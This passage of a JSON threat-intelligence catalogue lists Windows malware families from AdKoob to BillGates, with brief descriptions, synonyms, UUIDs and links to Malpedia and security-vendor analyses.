"https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" ], "synonyms": [], "type": [] }, "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", "value": "AdKoob" }, { "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" ], "synonyms": [], "type": [] }, "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", "value": "AdvisorsBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" ], "synonyms": [], "type": [] }, "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", "Sun rootkit" ], "type": [] }, "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", "value": "Agent.BTZ" }, { "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" ], "synonyms": [], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" ], "synonyms": [], "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", "value": "Project Alice" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" ], "synonyms": [ "alina_eagle", "alina_spark", "katrina" ], "type": [] }, "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" ], "synonyms": [ "Starman" ], "type": [] }, "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" ], "synonyms": [], "type": [] }, "uuid": "a0881a0c-e677-495b-b475-290af09bb716", "value": "Alma Communicator" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" ], "synonyms": [], "type": [] }, "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", "value": "AlmaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", "value": "ALPC Local PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" ], "synonyms": [], "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", "value": "Alphabet Ransomware" }, { "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" ], "synonyms": [], "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", "value": "AlphaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", "value": "AlphaNC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", "value": "Alreay" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" ], "synonyms": [ "Olmarik", "Pihar", "TDL", "TDSS" ], "type": [] }, "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" ], "synonyms": [ "Adupihan" ], "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ "B106-Gamarue", "B67-SS-Gamarue", "Gamarue", "b66" ], "type": [] }, "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", "value": "Andromeda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" ], "synonyms": [], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" ], "synonyms": [ "Latinus" ], "type": [] }, "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" ], "synonyms": [], "type": [] }, "uuid": "d3e16d46-e436-4757-b962-6fd393056415", "value": "Apocalipto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" ], "synonyms": [], "type": [] }, "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", "value": "Apocalypse" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" ], "synonyms": [], "type": [] }, "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", "value": "ArdaMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", "value": "Arefty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", "http://remote-keylogger.net/", "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" ], "synonyms": [ "Aaron Keylogger" ], "type": [] }, "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", "value": "Arik Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], "synonyms": [], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", "value": "Arkei Stealer" }, { "description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", "https://twitter.com/Racco42/status/1001374490339790849", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" ], "synonyms": [], "type": [] }, "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", "value": "AscentLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" ], "synonyms": [], "type": [] }, "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", "value": "ASPC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/" ], "synonyms": [ "Aseljo", "BadSrc" ], "type": [] }, "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", "value": "Asprox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", "http://blog.talosintel.com/2017/02/athena-go.html" ], "synonyms": [], "type": [] }, "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", "value": "AthenaGo RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", "value": "ATI-Agent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" ], "synonyms": [], "type": [] }, "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", "value": "ATMii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" ], "synonyms": [], "type": [] }, "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", "value": "ATMitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", "value": "Atmosphere" }, { "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], "type": [] }, "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene", "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html" ], "synonyms": [], "type": [] }, "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", "value": "August Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "Riodrv" ], "type": [] }, "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", "value": "Auriga" }, { "description": "Ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" ], "synonyms": [], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" ], "synonyms": [], "type": [] }, "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", "value": "AvastDisabler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" ], "synonyms": [], "type": [] }, "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", "value": "AVCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], "type": [] }, "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" ], "synonyms": [], "type": [] }, "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", "value": "Avzhan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" ], "synonyms": [], "type": [] }, "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", "value": "Ayegent" }, { "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ "PuffStealer", "Rultazo" ], "type": [] }, "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", "value": "Azorult" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" ], "synonyms": [ "SNOWBALL" ], "type": [] }, "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet", "https://github.com/valsov/BackNet" ], "synonyms": [], "type": [] }, "uuid": "e2840cc1-c43d-4542-9818-a3c15a0f9f7a", "value": "BackNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], "type": [] }, "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", "https://twitter.com/PhysicalDrive0/status/833067081981710336" ], "synonyms": [], "type": [] }, "uuid": "af1c99be-e55a-473e-abed-726191e1da05", "value": "BadEncript" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", "value": "badflick" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" ], "synonyms": [], "type": [] }, "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", "value": "BadNews" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" ], "synonyms": [], "type": [] }, "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", "value": "Bagle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" ], "synonyms": [], "type": [] }, "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", "value": "Banatrix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" ], "synonyms": [], "type": [] }, "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", "value": "bangat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", "http://blog.kleissner.org/?p=69", "http://osint.bambenekconsulting.com/feeds/", "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/", "http://blog.kleissner.org/?p=192" ], "synonyms": [ "BackPatcher", "BankPatch", "MultiBanker 2" ], "type": [] }, "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", "value": "Banjori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" ], "synonyms": [], "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", "value": "Bankshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" ], "synonyms": [], "type": [] }, "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", "value": "Bart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" ], "synonyms": [], "type": [] }, "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", "value": "BatchWiper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" ], "synonyms": [], "type": [] }, "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", "value": "Batel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [], "type": [] }, "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" ], "synonyms": [], "type": [] }, "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", "value": "Bedep" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" ], "synonyms": [], "type": [] }, "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", "value": "BernhardPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", "http://www.xylibox.com/2015/04/betabot-retrospective.html", "https://asert.arbornetworks.com/beta-bot-a-code-review/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" ], "synonyms": [ "Neurevt" ], "type": [] }, "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" ], "synonyms": [], "type": [] }, "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", "value": "BfBot" }, { "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to 